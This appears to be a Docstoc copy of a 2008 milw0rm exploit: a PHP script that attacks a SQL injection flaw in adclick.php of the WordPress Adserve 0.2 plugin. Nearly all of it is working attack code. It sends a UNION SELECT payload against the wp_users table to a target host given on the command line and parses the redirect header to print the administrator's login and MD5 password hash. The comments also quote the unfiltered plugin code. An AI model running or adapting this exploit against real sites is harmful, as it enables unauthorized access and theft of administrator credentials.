Docstoc

Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit

Document Sample
Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit Powered By Docstoc
					                           Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit                             Page 1/2
  1    <?
  2    # WordPress Adserve plugin v 0.2 Sql Injection Exploit
  3    #
  4    # Plugin Homepage−http://www.irisco.it/?page_id=40
  5    #
  6    # Found by:enter_the_dragon
  7    #
  8
  9    #   Vuln code
  10   #
  11   #   −In adclick.php
  12   #
  13   #   if (isset($_GET[’id’])) {
  14   #      Header("Location: ".iri_AdServe_BannerClick($_GET[’id’])
  15   #
  16   #   −In   iri_AdServe_BannerClick function
  17   #
  18   #          return $wpdb−>get_var("SELECT url FROM $table_name WHERE id=$id;");
  19   #
  20   #
  21   #
  22
  23   # Exploit
  24   #
  25   # id variable isnt filtered so we can inject and check the output in the Location response−header
  26   # If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved
  27   #
  28   #
  29
  30
  31
  32
  33   echo "\n";
  34   echo "−−−−−−−WordPress Adserve plugin v 0.2 Sql Injection Exploit−−−−−−−"."\n";
  35   echo "−−−−−−−−−−−−−−−−−−−coded by : enter_the_dragon−−−−−−−−−−−−−−−−−−−−"."\n";
  36   echo "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−"."\n";
  37   if ($argc!=3)
  38   {
  39   echo " Usage:       $argv[0] target_host wp_path \n";
  40   echo " target_host:             Your target ex www.target.com \n";
  41   echo " wp_path:     WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
  42   echo "\n";
  43   exit;
  44   }
  45
  46
  47   $query=$argv[1];
  48   $query.=$argv[2];
  49   $query.="wp−content/plugins/wp−adserve/adclick.php?";
  50   $query.="id=−1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";
  51
  52

enter_the_dragon                                                                                                      01/30/2008
                          Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit             Page 2/2
  53   if(function_exists(curl_init))
  54   {
  55     $ch = curl_init("http://$query");
  56     curl_setopt($ch, CURLOPT_HEADER,true);
  57     curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
  58     curl_setopt($ch, CURLOPT_TIMEOUT,10);
  59     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
  60     $html=curl_exec($ch);
  61     $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
  62     curl_close($ch);
  63
  64        if($returncode==302)
  65           {
  66               $pattern="/\|(.*)?\|([a−z0−9]{32})\|/";
  67               if(preg_match($pattern,$html,$matches))
  68                 {
  69                   $adminusername=$matches[1];
  70                   $adminpass=$matches[2];
  71                   echo "Admin Login:$adminusername\n" ;
  72                   echo "Admin Pass :$adminpass\n";
  73                 }
  74           }
  75               else
  76           {
  77               exit ("Exploit Failed :( \n");
  78           }
  79
  80
  81   }
  82   else
  83   exit("Error:Libcurl isnt installed \n");
  84
  85   ?>
  86
  87   # milw0rm.com [2008−01−30]




enter_the_dragon                                                                                     01/30/2008

				
DOCUMENT INFO